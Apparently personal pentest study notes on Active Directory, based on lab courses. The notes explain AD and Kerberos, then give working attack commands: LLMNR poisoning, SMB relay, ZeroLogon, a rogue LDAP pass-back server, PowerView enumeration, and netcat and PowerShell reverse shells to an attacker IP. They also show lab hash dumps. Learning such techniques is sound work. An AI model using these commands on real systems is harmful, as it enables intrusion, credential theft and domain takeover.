"A Domain Controller is a Windows server that provides Active Directory services and controls the entire domain. It is a form of centralized user management that provides encryption of user data as well as controlling access to a network, including users, groups, policies, and computers. It also enables resource access and sharing. These are all reasons why attackers target a domain controller in a domain because it contains a lot of high-value information."
> *Source: tryhackme*
### AD DS Data Store
When compromising AD we want to grab this file, it contains everything users objects groups password hashes for all the users etc…
## Logical Components
Domain => Tree => Forest
### AD DS Schema
### Domains
### Trees
### Forests
### Organizational Units (Ous)
"Organizational Units (OU's) are containers within the AD domain with a hierarchical structure."
> *Source:tryhackme*
### Trusts
### Objects
Active Directory Objects can be a single user or a group, or a hardware component, such as a computer or printer. Each domain holds a database that contains object identity information that creates an AD environment, including:
- Users - A security principal that is allowed to authenticate to machines in the domain
- Computers - A special type of user accounts
- GPOs - Collections of policies that are applied to other AD objects
- Domain are used to manage objects in an org
- If multiple domain, we have a tree
- If multiple set of trees we have a forest
- Across forest or across domain we have trust
- Here is a very comprehensive Schema from HTB Academy
### Rights and privileges in AD
| Group | Description|
|-------|------------|
|Default Administrators|Domain Admins and Enterprise Admins "super" groups.|
|Server Operators|Members can modify services, access SMB shares, and backup files.|
|Backup Operators|Members are allowed to log onto DCs locally and should be considered Domain Admins. They can make shadow copies of the SAM/NTDS database, read the registry remotely, and access the file system on the DC via SMB. This group is sometimes added to the local Backup Operators group on non-DCs.|
|Print Operators|Members are allowed to logon to DCs locally and "trick" Windows into loading a malicious driver.|
|Hyper-V Administrators|If there are virtual DCs, any virtualization admins, such as members of Hyper-V Administrators, should be considered Domain Admins.|
|Account Operators|Members can modify non-protected accounts and groups in the domain.|
|Remote Desktop Users|Members are not given any useful permissions by default but are often granted additional rights such as Allow Login Through Remote Desktop Services and can move laterally using the RDP protocol.|
|Remote Management Users|Members are allowed to logon to DCs with PSRemoting (This group is sometimes added to the local remote management group on non-DCs).|
|Group Policy Creator Owners|Members can create new GPOs but would need to be delegated additional permissions to link GPOs to a container such as a domain or OU.|
|Schema Admins|Members can modify the Active Directory schema structure and can backdoor any to-be-created Group/GPO by adding a compromised account to the default object ACL.|
|DNS Admins|Members have the ability to load a DLL on a DC but do not have the necessary permissions to restart the DNS server. They can load a malicious DLL and wait for a reboot as a persistence mechanism. Loading a DLL will often result in the service crashing. A more reliable way to exploit this group is to create a WPAD record.|
## Types of Active Directory
There are two types of Active Directory:
- On-Premise Active Directory (AD)
- Azure Active Directory (AAD)
### Authentication on On-Premise Active Directory
On-premise Active Directory has a record of all users, PCs and Servers and authenticates the users signing in (the network logon). Once signed in, Active Directory also governs what the users are, and are not, allowed to do or access (authorization).
In an on-premise Active Directory environment the authentication can be made by using the following protocols:
- NTLM
- LDAP / LDAPS
- KERBEROS
### Authentication on Azure Active Directory
Azure Active Directory is a secure online authentication store, which can contain users and groups. Users have a username and a password which are used when you sign in to an application that uses Azure Active Directory for authentication. So, for example, all of the Microsoft Cloud services use Azure Active Directory for authentication: Office 365, Dynamics 365 and Azure.
Azure Active Directory supports the following authentication methods:
- SAML (Security Assertion Markup Language)
- OAUTH 2.0
- OpenID Connect
## SAML (Security Assertion Markup Language)
Security Assertion Markup Language (SAML) is a type of Single Sign-On (SSO) standard. It defines a set of rules/protocols that allow users to access web applications with a single login. This is possible because those applications (referred to as “Service Providers”) all trust the systems that verify users’ identities (referred to as “Identity Providers”).
Service Providers - These are the systems and applications that users access throughout the day.
Identity Providers - This would be the system that performs user authentication.
## OAUTH 2.0
OAuth 2.0 is a standard that apps use to provide client applications with access.
OAuth 2.0 spec has four important roles:
- The authorization server, which is the server that issues the access token.
- The resource owner, normally your application's end-user, that grants permission to access the resource server with an access token.
- The client, which is the application that requests the access token, and then passes it to the resource server.
- The resource server, which accepts the access token and must verify that it is valid. In this case, this is your application.
## OpenID Connect
OpenID Connect is an authentication standard built on top of OAuth 2.0. It adds an additional token called an ID token.
For that, it uses simple JSON Web Tokens (JWT). While OAuth 2.0 is about resource access and sharing, OIDC is all about user authentication
## LDAP Overview
The relationship between AD and LDAP can be compared to Apache and HTTP. The same way Apache is a web server that uses the HTTP protocol, Active Directory is a directory server that uses the LDAP protocol.
While uncommon, you may come across organizations while performing an assessment that does not have AD but does have LDAP, meaning that they most likely use another type of LDAP server such as [OpenLDAP](https://en.wikipedia.org/wiki/OpenLDAP).
### LDAP authentication
### LDAP Pass-back Attacks
This is a common attack against network devices, such as printers, when you have gained initial access to the internal network, such as plugging in a rogue device in a boardroom.
LDAP Pass-back attacks can be performed when we gain access to a device's configuration where the LDAP parameters are specified. This can be, for example, the web interface of a network printer. Usually, the credentials for these interfaces are kept to the default ones, such as admin:admin or admin:password. Here, we won't be able to directly extract the LDAP credentials since the password is usually hidden. However, we can alter the LDAP configuration, such as the IP or hostname of the LDAP server. In an LDAP Pass-back attack, we can modify this IP to our IP and then test the LDAP configuration, which will force the device to attempt LDAP authentication to our rogue device. We can intercept this authentication attempt to recover the LDAP credentials.
> *Source: [Tryhackme](https://tryhackme.com/room/breachingad)*
## NTLM and NetNTLM
NetNTLM, also often referred to as Windows Authentication or just NTLM Authentication, allows the application to play the role of a middle man between the client and AD. All authentication material is forwarded to a Domain Controller in the form of a challenge, and if completed successfully, the application will authenticate the user.
This means that the application is authenticating on behalf of the user and not authenticating the user directly on the application itself. This prevents the application from storing AD credentials, which should only be stored on a Domain Controller. This process is shown in the diagram below:
> *Source: [Tryhackme](https://tryhackme.com/room/breachingad)*
## Kerberos
Kerberos is the default authentication service for Microsoft Windows domains. It is intended to be more "secure" than NTLM by using third party ticket authorization as well as stronger encryption. Even though NTLM has a lot more attack vectors to choose from Kerberos still has a handful of underlying vulnerabilities just like NTLM that we can use to our advantage.
### Common Terminology
- Ticket Granting Ticket (TGT) - A ticket-granting ticket is an authentication ticket used to request service tickets from the TGS for specific resources from the domain.
- Key Distribution Center (KDC) - The Key Distribution Center is a service for issuing TGTs and service tickets that consist of the Authentication Service and the Ticket Granting Service.
- Authentication Service (AS) - The Authentication Service issues TGTs to be used by the TGS in the domain to request access to other machines and service tickets.
- Ticket Granting Service (TGS) - The Ticket Granting Service takes the TGT and returns a ticket to a machine on the domain.
- Service Principal Name (SPN) - A Service Principal Name is an identifier given to a service instance to associate a service instance with a domain service account. Windows requires that services have a domain service account which is why a service needs an SPN set.
- KDC Long Term Secret Key (KDC LT Key) - The KDC key is based on the KRBTGT service account. It is used to encrypt the TGT and sign the PAC.
- Client Long Term Secret Key (Client LT Key) - The client key is based on the computer or service account. It is used to check the encrypted timestamp and encrypt the session key.
- Service Long Term Secret Key (Service LT Key) - The service key is based on the service account. It is used to encrypt the service portion of the service ticket and sign the PAC.
- Session Key - Issued by the KDC when a TGT is issued. The user will provide the session key to the KDC along with the TGT when requesting a service ticket.
- Privilege Attribute Certificate (PAC) - The PAC holds all of the user's relevant information, it is sent along with the TGT to the KDC to be signed by the Target LT Key and the KDC LT Key in order to validate the user.
### AS-REQ w/ Pre-Authentication
The AS-REQ step in Kerberos authentication starts when a user requests a TGT from the KDC. In order to validate the user and create a TGT for the user, the KDC must follow these exact steps. The first step is for the user to encrypt a timestamp NT hash and send it to the AS. The KDC attempts to decrypt the timestamp using the NT hash from the user, if successful the KDC will issue a TGT as well as a session key for the user.
#### Ticket Granting Ticket Contents
In order to understand how the service tickets get created and validated, we need to start with where the tickets come from; the TGT is provided by the user to the KDC, in return, the KDC validates the TGT and returns a service ticket.
> *Source: [TryHackMe](https://tryhackme.com/)*
#### Service Ticket Contents
To understand how Kerberos authentication works you first need to understand what these tickets contain and how they're validated. A service ticket contains two portions: the service provided portion and the user-provided portion. I'll break it down into what each portion contains.
- Service Portion: User Details, Session Key, Encrypts the ticket with the service account NTLM hash.
- User Portion: Validity Timestamp, Session Key, Encrypts with the TGT session key.
> *Source: [TryHackMe](https://tryhackme.com/)*
### Kerberos Authentication Overview
> *Source: [TryHackMe](https://tryhackme.com/)*
AS-REQ - 1.) The client requests an Authentication Ticket or Ticket Granting Ticket (TGT).
AS-REP - 2.) The Key Distribution Center verifies the client and sends back an encrypted TGT.
TGS-REQ - 3.) The client sends the encrypted TGT to the Ticket Granting Server (TGS) with the Service Principal Name (SPN) of the service the client wants to access.
TGS-REP - 4.) The Key Distribution Center (KDC) verifies the TGT of the user and that the user has access to the service, then sends a valid session key for the service to the client.
AP-REQ - 5.) The client requests the service and sends the valid session key to prove the user has access.
AP-REP - 6.) The service grants access
### Kerberos Tickets Overview
The main ticket that you will see is a ticket-granting ticket these can come in various forms such as a .kirbi for Rubeus .ccache for Impacket. The main ticket that you will see is a .kirbi ticket. A ticket is typically base64 encoded and can be used for various attacks. The ticket-granting ticket is only used with the KDC in order to get service tickets. Once you give the TGT the server then gets the User details, session key, and then encrypts the ticket with the service account NTLM hash. Your TGT then gives the encrypted timestamp, session key, and the encrypted TGT. The KDC will then authenticate the TGT and give back a service ticket for the requested service. A normal TGT will only work with that given service account that is connected to it however a KRBTGT allows you to get any service ticket that you want allowing you to access anything on the domain that you want.
### Attack Privilege Requirements
- Kerbrute Enumeration - No domain access required
- Pass the Ticket - Access as a user to the domain required
- Kerberoasting - Access as any user required
- AS-REP Roasting - Access as any user required
- Golden Ticket - Full domain compromise (domain admin) required
- Silver Ticket - Service hash required
- Skeleton Key - Full domain compromise (domain admin) required
# Attacking Active Directory
## Methodology
- Useful tool to install in kali is [pimpmykali](https://github.com/Dewalt-arch/pimpmykali) (choose 0 in option menu)
- First thing to do is launch responder (along with scans to generate traffic)
- LLMNR Poisoning
- SMB Relay Attack
- Look for websites in scope
- Check for default credentials (printers, tomcat, jenkins,...)
- Compromise a machine (as many as possible with lateral movement)
- Enumerate (network) with tools for post-compromise attack
- Get Domain Admin with post-compromise attacks
- Dump with mimikatz
## Resources
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md
- https://github.com/Cloud-Architekt/AzureAD-Attack-Defense
- https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
- https://github.com/drak3hft7/Cheat-Sheet---Active-Directory
- https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
- https://github.com/Orange-Cyberdefense/arsenal/blob/master/mindmap/pentest_ad.png
- https://github.com/Orange-Cyberdefense/GOAD
# LLMNR Poisoning
## What is LLMNR
> *Source: TCM Security Academy*
> *Source: TCM Security Academy*
## Responder
- [Impacket](https://github.com/SecureAuthCorp/impacket): tool to abuse LLMNR:
Best to run first thing in the morning
```responder -I eth0 -rdwv```
And when there will be activity in the network we will be able to get hashes
## Hascat
- We use hashcat to crack the hashes we got previously
- When looking for a module in hascat we can grep on the hash we need:
```hashcat --help | grep NTLM```
- Command
```hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt```
## LLMNR Poisoning Defense
> *Source: TCM Security Academy*
# SMB Relay Attacks
## What is SMB Relay
> *Source: TCM Security Academy*
> *Source: TCM Security Academy*
## Discovering hosts
- Possible with [Nessus](https://www.tenable.com/products/nessus)
- With [Nmap](https://nmap.org/)
```nmap --script=smb2-security-mode.nse -p445 10.0.2.0/24```
Example of what we get with this scan:
```bash
┌──(root💀kali)-[/home/kali]
└─# nmap --script=smb2-security-mode.nse -p445 10.0.2.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-29 16:36 EST
[STRIPPED]
Nmap scan report for 10.0.2.4
Host is up (0.00062s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:FC:72:E9 (Oracle VirtualBox virtual NIC)
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Nmap scan report for 10.0.2.5
Host is up (0.00052s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:7F:90:90 (Oracle VirtualBox virtual NIC)
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Nmap scan report for 10.0.2.15
Host is up (0.00059s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:AE:C1:68 (Oracle VirtualBox virtual NIC)
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
[STRIPPED]
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.67 seconds
```
The domain controller has `enable` and `required`, we wont relay on this machine.
## SMB Relay Attack
### Attack 1st way
- In responder config (Responder.conf) we put http and smb on off
- Responder command
```responder -I eth0 -rdwv```
- Launch ntlmrelayx.py (our target ips are in targets.txt)
```ntlmrelayx.py -tf targets.txt -smb2support```
- We should get som hashes on our kali
```bash
[*] Done dumping SAM hashes for host: 10.0.2.4
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:25e61d7e5702c678e3be8711c03b7837:::
Jessica Jones:1001:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0:::
```
### Attack 2nd way
- We launch Responder (with http and smb off), we launch ntlmrelayx.py just like befor but with -i to try to get an interactive shell.
```ntlmrelayx.py -tf targets.txt -smb2support -i```
- It should work and mention that we got a shell
```bash
[*] Servers started, waiting for connections
[*] SMBD-Thread-3: Received connection from 10.0.2.15, attacking target smb://10.0.2.4
[*] Authenticating against smb://10.0.2.4 as MARVEL\fcastle SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[STRIPPED]
```
- We can netcat to get the shell:
```nc 127.0.0.1 11000```
- We have an smb shell:
```bash
└─# nc 127.0.0.1 11000
Type help for list of commands
# help
open {host,port=445} - opens a SMB connection against the target host/port
login {domain/username,passwd} - logs into the current SMB connection, no parameters for NULL connection. If no password specified, it'll be prompted
kerberos_login {domain/username,passwd} - logs into the current SMB connection using Kerberos. If no password specified, it'll be prompted. Use the DNS resolvable domain name
login_hash {domain/username,lmhash:nthash} - logs into the current SMB connection using the password hashes
logoff - logs off
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
lcd {path} - changes the current local directory to {path}
pwd - shows current remote directory
password - changes the user password, the new password will be prompted for input
ls {wildcard} - lists all the files in the current directory
rm {file} - removes the selected file
mkdir {dirname} - creates the directory under the current path
rmdir {dirname} - removes the directory under the current path
put {filename} - uploads the filename into the current path
get {filename} - downloads the filename from the current path
mount {target,path} - creates a mount point from {path} to {target} (admin required)
umount {path} - removes the mount point at {path} without deleting the directory (admin required)
info - returns NetrServerInfo main results
who - returns the sessions currently connected at the target host (admin required)
close - closes the current SMB Session
exit - terminates the server process (and this session)
# shares
ADMIN$
C$
IPC$
Share
# use C$
# ls
drw-rw-rw- 0 Fri Jan 28 19:29:18 2022 $Recycle.Bin
drw-rw-rw- 0 Fri Jan 28 20:21:23 2022 Documents and Settings
-rw-rw-rw- 8192 Sat Jan 29 16:14:20 2022 DumpStack.log.tmp
-rw-rw-rw- 1543503872 Sat Jan 29 16:14:20 2022 pagefile.sys
drw-rw-rw- 0 Fri Jan 28 20:18:41 2022 PerfLogs
drw-rw-rw- 0 Fri Jan 28 17:29:12 2022 Program Files
drw-rw-rw- 0 Fri Jan 28 20:18:41 2022 Program Files (x86)
drw-rw-rw- 0 Fri Jan 28 19:26:15 2022 ProgramData
drw-rw-rw- 0 Fri Jan 28 20:21:29 2022 Recovery
drw-rw-rw- 0 Fri Jan 28 19:33:38 2022 Share
-rw-rw-rw- 268435456 Sat Jan 29 16:14:20 2022 swapfile.sys
drw-rw-rw- 0 Fri Jan 28 17:21:44 2022 System Volume Information
drw-rw-rw- 0 Fri Jan 28 19:28:21 2022 Users
drw-rw-rw- 0 Fri Jan 28 17:23:30 2022 Windows
#
```
> *Note: ntlmrelayx.py is really powerfull and has many commands, we could even launch other shells.*
## SMB Relay attack Defenses
> *Source: TCM Security Academy*
# Shell Access
Payloads Deliver us Shells
Within the IT industry as a whole, Payload can be defined in a few different ways:
- Networking: The encapsulated data portion of a packet traversing modern computer networks.
- Basic Computing: A payload is the portion of an instruction set that defines the action to be taken. Headers and protocol information removed.
- Programming: The data portion referenced or carried by the programming language instruction.
- Exploitation & Security: A payload is code crafted with the intent to exploit a vulnerability on a computer system. The term payload can describe various types of malware, including but not limited to ransomware.
In this module, we will be working with many different types of payloads and delivery methods within the context of granting ourselves access to a host and establishing remote shell sessions with vulnerable systems.
## Shell validation
- `ps`
- `env`
## SMB - PSExec
### With Metasploit
```msfconsole```
- we can seach psexec or type:
```use exploit/windows/smb/psexec```
```show options```
- We need to set rhosts, lhost, smbdomain, smbpass and smbuser
- We also need to set the payload depending on our target for instance `windows/x64/meterpreter/reverse_tcp`
- We should get a shell
```bash
[*] Started reverse TCP handler on 10.0.2.8:4444
[*] 10.0.2.4:445 - Connecting to the server...
[*] 10.0.2.4:445 - Authenticating to 10.0.2.4:445|marvel.local as user 'fcastle'...
[*] 10.0.2.4:445 - Selecting PowerShell target
[*] 10.0.2.4:445 - Executing the payload...
[+] 10.0.2.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200262 bytes) to 10.0.2.4
[*] Meterpreter session 1 opened (10.0.2.8:4444 -> 10.0.2.4:51468 ) at 2022-02-04 10:28:51 -0500
meterpreter >
```
### With Impacket - psexec.py
Can be useful if meterprer is picked up by AV.
```bash
┌──(kali㉿kali)-[~]
└─$ psexec.py marvel.local/fcastle:Password1@10.0.2.4 1 ⨯
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.0.2.4.....
[*] Found writable share ADMIN$
[*] Uploading file OKJXcwkr.exe
[*] Opening SVCManager on 10.0.2.4.....
[*] Creating service tDbW on 10.0.2.4.....
[*] Starting service tDbW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19044.1288]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
```
- We can also try with: wmbexec.py or wmiexec.py (same command except for name of the script of course)
### Get a shell with nc.exe
- If we have access to a win and need to get a reverse shell for some reason (like privesc or else) we can use nc.exe
- You can get it here if you are on kali `/usr/share/windows-resources/binaries/nc.exe`
- Once on the target you can launch it with `nc.exe -e cmd.exe IP-KALI PORT`
- You could even put this line in a php file if say you had access to an ftp or smb that are used to transfer files to serve
```php
```
## Powershell
- Connect to our attack machine from a powershell prompt
- We set a listener `rlwrap nc -lvp 443`
- `powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`
# IPv6 Attacks
There's no dns for IPv6 (only for IPv4) so we can spoof it with mitm6
## Mitm6
- Fetch it [here](https://github.com/dirkjanm/mitm6)
- mitm6 command
```mitm6 -d domain-name.local```
- ntlmrelay
```ntlmrelayx.py -6 -t ldaps://DOMAIN-CONTROLLER-IP -wh fakewpad.domain.local -l lootme```
- Once the attack is successful we get a folder lootme with plenty of info from the DC
- If during the attack and admin logs in win 10 machine, mitm6 will create a new user for us:
```[*] Adding new user with username: YrAjkDnwzM and password: SHq]d(88dr%5+3R result: OK```
### Mitm6 - Resources
- https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
- https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
# Passback Attacks
## LDAP
- Imagine we have a printer in the network. In the example on tryhackme we have access to the setting page. It has a login page so we can alter the Server IP and put ours instead
- `nc -lvp 389`
- We get a connection back when sending the form. The console shows `supportedCapabilitiesresponse`
- As mentioned in the room:
"The `supportedCapabilitiesresponse` tells us we have a problem. Essentially, before the printer sends over the credentials, it is trying to negotiate the LDAP authentication method details. It will use this negotiation to select the most secure authentication method that both the printer and the LDAP server support. If the authentication method is too secure, the credentials will not be transmitted in cleartext. With some authentication methods, the credentials will not be transmitted over the network at all! So we can't just use normal Netcat to harvest the credentials. We will need to create a rogue LDAP server and configure it insecurely to ensure the credentials are sent in plaintext."
- `sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd`
- `sudo dpkg-reconfigure -p low slapd` to configure the LDAP server
- We then have to make a file `olcSaslSecProps.ldif`
```
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```
- `sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart`
- `sudo tcpdump -SX -i eth0 tcp port 389` (we need to replace eth0 with the appropriate interface)
- And we should get the password, just like in the example from tryhackme :
- https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
## Resources
- https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
- https://tryhackme.com/room/breachingad
# Abusing ZeroLogon
## Methodology
- Attacking DC and setting pass to null and taking over DC **CAREFUL COULD DESTROY DC**
- Check priorly if the target is vulnerable
*Note: Useful for a pentest to mention to the customer that they are vulnerable without actually doing the exploitation*
```
┌──(root💀kali)-[/home/kali/CVE-2020-1472]
└─# python3 zerologon_tester.py HYDRA-DC 10.0.2.5
Performing authentication attempts...
===================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
Success! DC can be fully compromised by a Zerologon attack.
```
- Changing the password to empty string: `python3 exploit.py HYDRA-DC 10.0.2.5`
- Check if it worked: `secretsdump.py -just-dc DOMAIN/DOMAIN-CONTROLLER\$@IP-OF-DC`
Example: `secretsdump.py -just-dc MARVEL/HYDRA-DC\$@10.0.2.5`
- If we were able to dump hashes without typing password it means we owned the DC.
- Restore the machine
- Use the admin hash to get the plain_password_hex `secretsdump.py administrator@10.0.2.5 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0`
- Restore the password `python3 restorepassword.py MARVEL/HYDRA-DC@HYDRA-DC -target-ip 10.0.2.5 -hexpass `
The console should print `Change password OK`
- There is also another way to exploit zerologon without resetting the DC password, check out [Dirk-Jan Mollema's article about this](https://dirkjanm.io/a-different-way-of-abusing-zerologon/)
## Zerologon - Resources
- https://lisandre.com/archives/14978
- https://www.trendmicro.com/en_us/what-is/zerologon.html
- https://github.com/dirkjanm/CVE-2020-1472
- https://github.com/SecuraBV/CVE-2020-1472
# Post-Compromise Enumeration
- We compromised a user what can we do with it
- How can we get Domain Admin
## ldapsearch - cmd line
- `ldapsearch -x -h IP-ADRESS -b "dc=DOMAIN-NAME,dc=LOCAL"` will send back a lot of useful info including user enum. Very efficient when you can leverage anonymous bind
## ldapsearch-ad.py - Example of commands
- `python3 ldapsearch-ad.py -l TARGET-IP -u firstname.lastname -p 'password' -d DOMAIN.LOCAL -t all` You will have very detailed infos on the domain and you can event output it in a file with `-o filename`
- `python3 ldapsearch-ad.py -l TARGET-IP -u firstname.lastname -p 'password' -d DOMAIN.LOCAL -t search -s '(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=262144))'` fin users with smartcard required for interactive logon
- `python3 ldapsearch-ad.py -l TARGET-IP -u firstname.lastname -p 'password' -d DOMAIN.LOCAL -t pass-pols` You will get the password policy
- `python3 ldapsearch-ad.py -l 10.129.42.188 -u firstname.lastname -p 'password' -d DOMAIN.LOCAL -t search -s '(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=128))'` user account has their userAccountControl value set to ENCRYPTED_TEXT_PWD_ALLOWED
## Tools
- https://github.com/yaap7/ldapsearch-ad
# Powerview or SharpView (.NET equivalent)
- Get it from [here](https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1) and put it in the compromised machine
- From a cmd in the target: `powershell -ep bypass`
- Launch Powerview: `. .\powerview.ps1`
- Get info on the Domain Controller: `Get-NetDomain`
- Check policies: `Get-DomainPolicy`
- Policies in System Access: `(Get-DomainPolicy)."systemAccess"` (e.g.: we get info about password policy and minimum length so min size if we want to password spray)
- Info about the users `Get-NetUser`
- Get only usenames `Get-NetUser | select cn` (e.g.: will output Jessica Jones)
- Get only sam account name: `Get-NetUser | select samaccountname` (e.g.: will output jjones)
- Get only description: `Get-NetUser | select description` (e.g.: will output a description if provided by sysadmn or a default one)
- See all the properties a user have: `Get-UserProperty`
- Get more details for example password last set: `Get-UserProperty -Properties pwdlastset`
- Get more details for example logoncount: `Get-UserProperty -Properties logoncount`
- See if users have entered bad passwd: `Get-UserProperty -Properties badpwdcount`
- List all the computers in the Domain: `Get-NetComputer`
- Same but with much more info: `Get-NetComputer -FullData`
- Filter this load of data with specific info: `Get-NetComputer -FullData | select OperatingSystem`
- Get info on groups: `Get-NetGroup`
- Filter for a specific GroupName: `Get-NetGroup -GroupName "Domain Admins" `
- Filter on GroupName with a wildcard: `Get-NetGroup -GroupName *admin* `
- Get users from a specific group: `Get-NetGroup -GroupName "Domain Admins" `
- Get smb shared in the network: `Invoke-ShareFinder`
- Get group policies: `Get-NetGPO`
- Filter the info: `Get-NetGroup -GroupName "Domain Admins" `
- `.\SharpView.exe ConvertTo-SID -Name first.last` Find SID of a user
- `.\SharpView.exe Convert-ADName -ObjectName SID` find user with SID
- `Get-DomainPolicy` View the domain password policy (will show passwordhistorysize)
- `Get-DomainUser first.last \| ConvertFrom-UACValue -showall` List all UAC values
- `.\SharpView.exe Get-Domain` View information about the current domain
- `.\SharpView.exe Get-DomainOU` List all OUs
- `.\SharpView.exe Get-DomainUser -KerberosPreauthNotRequired` Find ASREPRoastable users
- `Get-DomainComputer ` Get a listing of domain computers
- `.\SharpView.exe Get-DomainGPO \| findstr displayname` List all GPO names
- ` Get-DomainGPO -ComputerIdentity HOSTNAME` List GPOs on a specific host
- `Test-AdminAccess -ComputerName HOSTNAME` Test local admin access on a remote host
- `.\SharpView.exe Get-NetShare -ComputerName HOSTNAME` Enumerate open shares on a remote computer
- `Find-DomainUserLocation` Find machines where domain users are logged in
- `Get-DomainTrust` View a list of domain trusts
- `(Get-DomainUser).count` Count all domain users
- `.\SharpView.exe Get-DomainUser -Help` Get help about a SharpView function
- `Get-DomainUser -Properties samaccountname,description \| Where {$_.description -ne $null}` Find non-blank user description fields
- `.\SharpView.exe Get-DomainUser -SPN` Find users with SPNs set
- `Find-ForeignGroup` Find foreign domain users
- `Get-DomainGroup -Properties Name` List domain groups
- `.\SharpView.exe Get-DomainGroupMember -Identity 'Help Desk'` Get members of a domain group
- `.\SharpView.exe Get-DomainGroup -AdminCount` List protected groups
- `.\SharpView.exe Find-ManagedSecurityGroups` List managed security groups
- `Get-NetLocalGroup -ComputerName HOST` Get local groups on a host
- `.\SharpView.exe Get-NetLocalGroupMember -ComputerName HOSTNAME` Get members of a local group
- `.\SharpView.exe Get-DomainComputer -Unconstrained` Find computers that allow unconstrained delegation
- `Get-DomainComputer -TrustedToAuth` Find computers set with constrained delegation
- `Get-DomainObjectAcl -Identity first.last` Enumerate ACLs on a user
- `Find-InterestingDomainAcl` Find objects in the domain with modification rights over non built-in objects
- `Get-PathAcl "\\HOSTNAME\Directory"` Find the ACLs set on a directory
- ` gpresult /r /S HOSTNAME` Get a report of all GPOs applied to a host
- ` Get-DomainGPO \| Get-ObjectAcl` Find GPO permissions
- `Get-DomainTrustMapping` Enumerate trusts for our domain/reachable domains
- `Get-NetShare -ComputerName COMPUTER` List share on computer
- `Get-DomainGPO` list all gpo and related info
- `Get-DomainGPO | select displayname` list all gpo names
- `Get-DomainGPO | select displayname,objectguid` list gpo names with their guid
- `Get-DomainTrustMapping` enumerate all trusts for our current domain and other reachable domains
- `Get-NetDomain` similar to the ActiveDirectory module’s Get-ADDomain but contains a lot less information. Basic info such as the Forest, Domain Controllers, and Domain Name are enumerated.
- `Get-NetDomainController` list all of the Domain Controllers within the network
- `Get-NetForest` similar to Get-ADForest, and provides similar output. It provides all the associated Domains, the root domain, as well as the Domain Controllers for the root domain.
- `Get-NetDomainTrust` is similar to Get-ADTrust with our SelectObject filter applied to it.
## Enumerating Users
- `get-netuser` will output all infos about users in the domain
- `get-netuser | select cn` will list all users
- `get-netuser | select -expandproperty samaccountname` will list users but only samccountname
- `find-userfield -SearchField description "password"` will list description fields of users with a grep on "password"
## Enumerating Groups
- `get-netgroup` will list all the different groups in the domain
- `get-netgroup -Username "f.lastname"` will show group of user f.lastname
- `get-netgroup -GroupName "domain admins" -FullData` will show details of the group
## Enumerating Domain Computers and Shares
- `Get-NetComputer -OperatingSystem "*Windows 10*"` Get computer with Win 10 OS
- `Get-NetComputer -OperatingSystem "*server*"` Get the server
- `Invoke-ShareFinder` will list shares
- `Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC` will list sharw without standard print and IPC
## Find interesting files
- `Invoke-FileFinder`
## Enumerate Local Admin Users
- `Invoke-EnumerateLocalAdmin`
## Enumerating Group Policy Objects
- `get-netgpo`
## Enumerating Access Control Lists
- `get-objectacl`
- `get-objectacl -SamAccountName "name" -ResolveGUIDs`
## Enumerating the domain
- `get-netdomain`
- `Get-DomainPolicy`
- `Get-domainsid` useful for golden tickets
*Note: If you do not get result with powerview, you can try this in powershell `Import-Module .\PowerView.ps1`*
## Powerview - Resources
- [PowerView Cheat Sheet](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993)
# AD Manual Enumeration
## Operators to use with Filter
- `-eq` Equal to
- `-le` Less than or equal to
- `-ge` Greater than or equal to
- `-ne` Not equal to
- `-lt` Less than
- `-gt` Greater than
